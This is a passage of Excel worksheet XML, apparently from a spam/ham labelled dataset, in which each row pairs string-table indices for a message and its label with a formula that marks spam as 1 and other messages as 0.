      <c r="A173" t="s">
        <v>5465</v>
      </c>
      <c r="B173" t="s">
        <v>5294</v>
      </c>
      <c r="C173" s="1">
        <f>IF(B173="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="174" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A174" t="s">
        <v>5466</v>
      </c>
      <c r="B174" t="s">
        <v>5294</v>
      </c>
      <c r="C174" s="1">
        <f>IF(B174="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="175" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A175" t="s">
        <v>5467</v>
      </c>
      <c r="B175" t="s">
        <v>5294</v>
      </c>
      <c r="C175" s="1">
        <f>IF(B175="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="176" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A176" t="s">
        <v>5468</v>
      </c>
      <c r="B176" t="s">
        <v>5294</v>
      </c>
      <c r="C176" s="1">
        <f>IF(B176="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="177" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A177" t="s">
        <v>5469</v>
      </c>
      <c r="B177" t="s">
        <v>5294</v>
      </c>
      <c r="C177" s="1">
        <f>IF(B177="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="178" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A178" t="s">
        <v>5470</v>
      </c>
      <c r="B178" t="s">
        <v>5294</v>
      </c>
      <c r="C178" s="1">
        <f>IF(B178="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="179" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A179" t="s">
        <v>5471</v>
      </c>
      <c r="B179" t="s">
        <v>5294</v>
      </c>
      <c r="C179" s="1">
        <f>IF(B179="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="180" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A180" t="s">
        <v>5472</v>
      </c>
      <c r="B180" t="s">
        <v>5294</v>
      </c>
      <c r="C180" s="1">
        <f>IF(B180="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="181" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A181" t="s">
        <v>5473</v>
      </c>
      <c r="B181" t="s">
        <v>5294</v>
      </c>
      <c r="C181" s="1">
        <f>IF(B181="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="182" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A182" t="s">
        <v>5474</v>
      </c>
      <c r="B182" t="s">
        <v>5294</v>
      </c>
      <c r="C182" s="1">
        <f>IF(B182="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="183" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A183" t="s">
        <v>5475</v>
      </c>
      <c r="B183" t="s">
        <v>5294</v>
      </c>
      <c r="C183" s="1">
        <f>IF(B183="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="184" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A184" t="s">
        <v>5476</v>
      </c>
      <c r="B184" t="s">
        <v>5294</v>
      </c>
      <c r="C184" s="1">
        <f>IF(B184="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="185" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A185" t="s">
        <v>5477</v>
      </c>
      <c r="B185" t="s">
        <v>5294</v>
      </c>
      <c r="C185" s="1">
        <f>IF(B185="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="186" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A186" t="s">
        <v>5478</v>
      </c>
      <c r="B186" t="s">
        <v>5294</v>
      </c>
      <c r="C186" s="1">
        <f>IF(B186="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="187" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A187" t="s">
        <v>5479</v>
      </c>
      <c r="B187" t="s">
        <v>5294</v>
      </c>
      <c r="C187" s="1">
        <f>IF(B187="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="188" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A188" t="s">
        <v>5480</v>
      </c>
      <c r="B188" t="s">
        <v>5294</v>
      </c>
      <c r="C188" s="1">
        <f>IF(B188="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="189" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A189" t="s">
        <v>5481</v>
      </c>
      <c r="B189" t="s">
        <v>5297</v>
      </c>
      <c r="C189" s="1">
        <f>IF(B189="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="190" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A190" t="s">
        <v>5482</v>
      </c>
      <c r="B190" t="s">
        <v>5294</v>
      </c>
      <c r="C190" s="1">
        <f>IF(B190="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="191" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A191" t="s">
        <v>5483</v>
      </c>
      <c r="B191" t="s">
        <v>5294</v>
      </c>
      <c r="C191" s="1">
        <f>IF(B191="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="192" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A192" t="s">
        <v>5484</v>
      </c>
      <c r="B192" t="s">
        <v>5297</v>
      </c>
      <c r="C192" s="1">
        <f>IF(B192="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="193" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A193" t="s">
        <v>5485</v>
      </c>
      <c r="B193" t="s">
        <v>5294</v>
      </c>
      <c r="C193" s="1">
        <f>IF(B193="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="194" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A194" t="s">
        <v>5486</v>
      </c>
      <c r="B194" t="s">
        <v>5294</v>
      </c>
      <c r="C194" s="1">
        <f>IF(B194="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="195" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A195" t="s">
        <v>5487</v>
      </c>
      <c r="B195" t="s">
        <v>5294</v>
      </c>
      <c r="C195" s="1">
        <f>IF(B195="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="196" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A196" t="s">
        <v>5488</v>
      </c>
      <c r="B196" t="s">
        <v>5294</v>
      </c>
      <c r="C196" s="1">
        <f>IF(B196="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="197" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A197" t="s">
        <v>5489</v>
      </c>
      <c r="B197" t="s">
        <v>5294</v>
      </c>
      <c r="C197" s="1">
        <f>IF(B197="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="198" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A198" t="s">
        <v>5490</v>
      </c>
      <c r="B198" t="s">
        <v>5294</v>
      </c>
      <c r="C198" s="1">
        <f>IF(B198="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="199" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A199" t="s">
        <v>5491</v>
      </c>
      <c r="B199" t="s">
        <v>5294</v>
      </c>
      <c r="C199" s="1">
        <f>IF(B199="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="200" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A200" t="s">
        <v>5492</v>
      </c>
      <c r="B200" t="s">
        <v>5294</v>
      </c>
      <c r="C200" s="1">
        <f>IF(B200="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="201" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A201" t="s">
        <v>5493</v>
      </c>
      <c r="B201" t="s">
        <v>5294</v>
      </c>
      <c r="C201" s="1">
        <f>IF(B201="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="202" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A202" t="s">
        <v>5494</v>
      </c>
      <c r="B202" t="s">
        <v>5294</v>
      </c>
      <c r="C202" s="1">
        <f>IF(B202="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="203" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A203" t="s">
        <v>5495</v>
      </c>
      <c r="B203" t="s">
        <v>5294</v>
      </c>
      <c r="C203" s="1">
        <f>IF(B203="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="204" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A204" t="s">
        <v>5496</v>
      </c>
      <c r="B204" t="s">
        <v>5294</v>
      </c>
      <c r="C204" s="1">
        <f>IF(B204="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="205" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A205" t="s">
        <v>5497</v>
      </c>
      <c r="B205" t="s">
        <v>5294</v>
      </c>
      <c r="C205" s="1">
        <f>IF(B205="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="206" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A206" t="s">
        <v>5498</v>
      </c>
      <c r="B206" t="s">
        <v>5294</v>
      </c>
      <c r="C206" s="1">
        <f>IF(B206="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="207" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A207" t="s">
        <v>5499</v>
      </c>
      <c r="B207" t="s">
        <v>5294</v>
      </c>
      <c r="C207" s="1">
        <f>IF(B207="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="208" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A208" t="s">
        <v>5410</v>
      </c>
      <c r="B208" t="s">
        <v>5294</v>
      </c>
      <c r="C208" s="1">
        <f>IF(B208="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="209" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A209" t="s">
        <v>5500</v>
      </c>
      <c r="B209" t="s">
        <v>5294</v>
      </c>
      <c r="C209" s="1">
        <f>IF(B209="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="210" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A210" t="s">
        <v>5501</v>
      </c>
      <c r="B210" t="s">
        <v>5294</v>
      </c>
      <c r="C210" s="1">
        <f>IF(B210="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="211" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A211" t="s">
        <v>5502</v>
      </c>
      <c r="B211" t="s">
        <v>5294</v>
      </c>
      <c r="C211" s="1">
        <f>IF(B211="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="212" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A212" t="s">
        <v>5503</v>
      </c>
      <c r="B212" t="s">
        <v>5294</v>
      </c>
      <c r="C212" s="1">
        <f>IF(B212="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="213" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A213" t="s">
        <v>5504</v>
      </c>
      <c r="B213" t="s">
        <v>5294</v>
      </c>
      <c r="C213" s="1">
        <f>IF(B213="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="214" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A214" t="s">
        <v>5505</v>
      </c>
      <c r="B214" t="s">
        <v>5294</v>
      </c>
      <c r="C214" s="1">
        <f>IF(B214="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="215" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A215" t="s">
        <v>5506</v>
      </c>
      <c r="B215" t="s">
        <v>5294</v>
      </c>
      <c r="C215" s="1">
        <f>IF(B215="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="216" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A216" t="s">
        <v>5507</v>
      </c>
      <c r="B216" t="s">
        <v>5294</v>
      </c>
      <c r="C216" s="1">
        <f>IF(B216="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="217" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A217" t="s">
        <v>5508</v>
      </c>
      <c r="B217" t="s">
        <v>5294</v>
      </c>
      <c r="C217" s="1">
        <f>IF(B217="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="218" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A218" t="s">
        <v>5509</v>
      </c>
      <c r="B218" t="s">
        <v>5294</v>
      </c>
      <c r="C218" s="1">
        <f>IF(B218="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="219" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A219" t="s">
        <v>5510</v>
      </c>
      <c r="B219" t="s">
        <v>5294</v>
      </c>
      <c r="C219" s="1">
        <f>IF(B219="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="220" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A220" t="s">
        <v>5511</v>
      </c>
      <c r="B220" t="s">
        <v>5294</v>
      </c>
      <c r="C220" s="1">
        <f>IF(B220="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="221" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A221" t="s">
        <v>5512</v>
      </c>
      <c r="B221" t="s">
        <v>5294</v>
      </c>
      <c r="C221" s="1">
        <f>IF(B221="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="222" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A222" t="s">
        <v>5513</v>
      </c>
      <c r="B222" t="s">
        <v>5294</v>
      </c>
      <c r="C222" s="1">
        <f>IF(B222="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="223" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A223" t="s">
        <v>5514</v>
      </c>
      <c r="B223" t="s">
        <v>5294</v>
      </c>
      <c r="C223" s="1">
        <f>IF(B223="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="224" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A224" t="s">
        <v>5376</v>
      </c>
      <c r="B224" t="s">
        <v>5294</v>
      </c>
      <c r="C224" s="1">
        <f>IF(B224="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="225" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A225" t="s">
        <v>5515</v>
      </c>
      <c r="B225" t="s">
        <v>5294</v>
      </c>
      <c r="C225" s="1">
        <f>IF(B225="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="226" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A226" t="s">
        <v>5516</v>
      </c>
      <c r="B226" t="s">
        <v>5297</v>
      </c>
      <c r="C226" s="1">
        <f>IF(B226="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="227" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A227" t="s">
        <v>5517</v>
      </c>
      <c r="B227" t="s">
        <v>5294</v>
      </c>
      <c r="C227" s="1">
        <f>IF(B227="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="228" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A228" t="s">
        <v>5518</v>
      </c>
      <c r="B228" t="s">
        <v>5297</v>
      </c>
      <c r="C228" s="1">
        <f>IF(B228="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="229" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A229" t="s">
        <v>5519</v>
      </c>
      <c r="B229" t="s">
        <v>5294</v>
      </c>
      <c r="C229" s="1">
        <f>IF(B229="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="230" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A230" t="s">
        <v>5520</v>
      </c>
      <c r="B230" t="s">
        <v>5294</v>
      </c>
      <c r="C230" s="1">
        <f>IF(B230="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="231" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A231" t="s">
        <v>5521</v>
      </c>
      <c r="B231" t="s">
        <v>5294</v>
      </c>
      <c r="C231" s="1">
        <f>IF(B231="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="232" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A232" t="s">
        <v>5522</v>
      </c>
      <c r="B232" t="s">
        <v>5294</v>
      </c>
      <c r="C232" s="1">
        <f>IF(B232="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="233" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A233" t="s">
        <v>5523</v>
      </c>
      <c r="B233" t="s">
        <v>5294</v>
      </c>
      <c r="C233" s="1">
        <f>IF(B233="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="234" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A234" t="s">
        <v>5524</v>
      </c>
      <c r="B234" t="s">
        <v>5294</v>
      </c>
      <c r="C234" s="1">
        <f>IF(B234="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="235" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A235" t="s">
        <v>5525</v>
      </c>
      <c r="B235" t="s">
        <v>5294</v>
      </c>
      <c r="C235" s="1">
        <f>IF(B235="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="236" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A236" t="s">
        <v>5526</v>
      </c>
      <c r="B236" t="s">
        <v>5297</v>
      </c>
      <c r="C236" s="1">
        <f>IF(B236="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="237" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A237" t="s">
        <v>5527</v>
      </c>
      <c r="B237" t="s">
        <v>5294</v>
      </c>
      <c r="C237" s="1">
        <f>IF(B237="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="238" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A238" t="s">
        <v>5528</v>
      </c>
      <c r="B238" t="s">
        <v>5294</v>
      </c>
      <c r="C238" s="1">
        <f>IF(B238="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="239" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A239" t="s">
        <v>5529</v>
      </c>
      <c r="B239" t="s">
        <v>5294</v>
      </c>
      <c r="C239" s="1">
        <f>IF(B239="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="240" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A240" t="s">
        <v>5530</v>
      </c>
      <c r="B240" t="s">
        <v>5294</v>
      </c>
      <c r="C240" s="1">
        <f>IF(B240="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="241" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A241" t="s">
        <v>5531</v>
      </c>
      <c r="B241" t="s">
        <v>5297</v>
      </c>
      <c r="C241" s="1">
        <f>IF(B241="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="242" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A242" t="s">
        <v>5532</v>
      </c>
      <c r="B242" t="s">
        <v>5294</v>
      </c>
      <c r="C242" s="1">
        <f>IF(B242="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="243" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A243" t="s">
        <v>5533</v>
      </c>
      <c r="B243" t="s">
        <v>5294</v>
      </c>
      <c r="C243" s="1">
        <f>IF(B243="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="244" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A244" t="s">
        <v>5534</v>
      </c>
      <c r="B244" t="s">
        <v>5294</v>
      </c>
      <c r="C244" s="1">
        <f>IF(B244="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="245" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A245" t="s">
        <v>5535</v>
      </c>
      <c r="B245" t="s">
        <v>5294</v>
      </c>
      <c r="C245" s="1">
        <f>IF(B245="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="246" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A246" t="s">
        <v>5536</v>
      </c>
      <c r="B246" t="s">
        <v>5294</v>
      </c>
      <c r="C246" s="1">
        <f>IF(B246="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="247" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A247" t="s">
        <v>5537</v>
      </c>
      <c r="B247" t="s">
        <v>5294</v>
      </c>
      <c r="C247" s="1">
        <f>IF(B247="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="248" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A248" t="s">
        <v>5538</v>
      </c>
      <c r="B248" t="s">
        <v>5294</v>
      </c>
      <c r="C248" s="1">
        <f>IF(B248="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="249" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A249" t="s">
        <v>5539</v>
      </c>
      <c r="B249" t="s">
        <v>5294</v>
      </c>
      <c r="C249" s="1">
        <f>IF(B249="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="250" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A250" t="s">
        <v>5540</v>
      </c>
      <c r="B250" t="s">
        <v>5294</v>
      </c>
      <c r="C250" s="1">
        <f>IF(B250="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="251" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A251" t="s">
        <v>5541</v>
      </c>
      <c r="B251" t="s">
        <v>5297</v>
      </c>
      <c r="C251" s="1">
        <f>IF(B251="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="252" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A252" t="s">
        <v>5542</v>
      </c>
      <c r="B252" t="s">
        <v>5294</v>
      </c>
      <c r="C252" s="1">
        <f>IF(B252="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="253" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A253" t="s">
        <v>5543</v>
      </c>
      <c r="B253" t="s">
        <v>5294</v>
      </c>
      <c r="C253" s="1">
        <f>IF(B253="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="254" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A254" t="s">
        <v>5544</v>
      </c>
      <c r="B254" t="s">
        <v>5294</v>
      </c>
      <c r="C254" s="1">
        <f>IF(B254="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="255" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A255" t="s">
        <v>5545</v>
      </c>
      <c r="B255" t="s">
        <v>5294</v>
      </c>
      <c r="C255" s="1">
        <f>IF(B255="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="256" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A256" t="s">
        <v>5546</v>
      </c>
      <c r="B256" t="s">
        <v>5294</v>
      </c>
      <c r="C256" s="1">
        <f>IF(B256="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="257" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A257" t="s">
        <v>5547</v>
      </c>
      <c r="B257" t="s">
        <v>5294</v>
      </c>
      <c r="C257" s="1">
        <f>IF(B257="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="258" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A258" t="s">
        <v>5548</v>
      </c>
      <c r="B258" t="s">
        <v>5294</v>
      </c>
      <c r="C258" s="1">
        <f>IF(B258="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="259" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A259" t="s">
        <v>5549</v>
      </c>
      <c r="B259" t="s">
        <v>5294</v>
      </c>
      <c r="C259" s="1">
        <f>IF(B259="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="260" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A260" t="s">
        <v>5550</v>
      </c>
      <c r="B260" t="s">
        <v>5297</v>
      </c>
      <c r="C260" s="1">
        <f>IF(B260="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="261" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A261" t="s">
        <v>5551</v>
      </c>
      <c r="B261" t="s">
        <v>5294</v>
      </c>
      <c r="C261" s="1">
        <f>IF(B261="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="262" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A262" t="s">
        <v>5552</v>
      </c>
      <c r="B262" t="s">
        <v>5294</v>
      </c>
      <c r="C262" s="1">
        <f>IF(B262="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="263" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A263" t="s">
        <v>5553</v>
      </c>
      <c r="B263" t="s">
        <v>5294</v>
      </c>
      <c r="C263" s="1">
        <f>IF(B263="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="264" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A264" t="s">
        <v>5554</v>
      </c>
      <c r="B264" t="s">
        <v>5294</v>
      </c>
      <c r="C264" s="1">
        <f>IF(B264="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="265" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A265" t="s">
        <v>5555</v>
      </c>
      <c r="B265" t="s">
        <v>5297</v>
      </c>
      <c r="C265" s="1">
        <f>IF(B265="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="266" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A266" t="s">
        <v>5556</v>
      </c>
      <c r="B266" t="s">
        <v>5294</v>
      </c>
      <c r="C266" s="1">
        <f>IF(B266="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="267" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A267" t="s">
        <v>5557</v>
      </c>
      <c r="B267" t="s">
        <v>5294</v>
      </c>
      <c r="C267" s="1">
        <f>IF(B267="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="268" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A268" t="s">
        <v>5558</v>
      </c>
      <c r="B268" t="s">
        <v>5294</v>
      </c>
      <c r="C268" s="1">
        <f>IF(B268="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="269" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A269" t="s">
        <v>5559</v>
      </c>
      <c r="B269" t="s">
        <v>5297</v>
      </c>
      <c r="C269" s="1">
        <f>IF(B269="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="270" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A270" t="s">
        <v>5560</v>
      </c>
      <c r="B270" t="s">
        <v>5294</v>
      </c>
      <c r="C270" s="1">
        <f>IF(B270="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="271" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A271" t="s">
        <v>5561</v>
      </c>
      <c r="B271" t="s">
        <v>5297</v>
      </c>
      <c r="C271" s="1">
        <f>IF(B271="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="272" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A272" t="s">
        <v>5562</v>
      </c>
      <c r="B272" t="s">
        <v>5294</v>
      </c>
      <c r="C272" s="1">
        <f>IF(B272="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="273" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A273" t="s">
        <v>5563</v>
      </c>
      <c r="B273" t="s">
        <v>5294</v>
      </c>
      <c r="C273" s="1">
        <f>IF(B273="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="274" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A274" t="s">
        <v>5564</v>
      </c>
      <c r="B274" t="s">
        <v>5297</v>
      </c>
      <c r="C274" s="1">
        <f>IF(B274="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="275" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A275" t="s">
        <v>5565</v>
      </c>
      <c r="B275" t="s">
        <v>5294</v>
      </c>
      <c r="C275" s="1">
        <f>IF(B275="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="276" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A276" t="s">
        <v>5566</v>
      </c>
      <c r="B276" t="s">
        <v>5294</v>
      </c>
      <c r="C276" s="1">
        <f>IF(B276="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="277" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A277" t="s">
        <v>5567</v>
      </c>
      <c r="B277" t="s">
        <v>5294</v>
      </c>
      <c r="C277" s="1">
        <f>IF(B277="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="278" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A278" t="s">
        <v>5568</v>
      </c>
      <c r="B278" t="s">
        <v>5294</v>
      </c>
      <c r="C278" s="1">
        <f>IF(B278="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="279" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A279" t="s">
        <v>5569</v>
      </c>
      <c r="B279" t="s">
        <v>5294</v>
      </c>
      <c r="C279" s="1">
        <f>IF(B279="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="280" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A280" t="s">
        <v>5570</v>
      </c>
      <c r="B280" t="s">
        <v>5294</v>
      </c>
      <c r="C280" s="1">
        <f>IF(B280="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
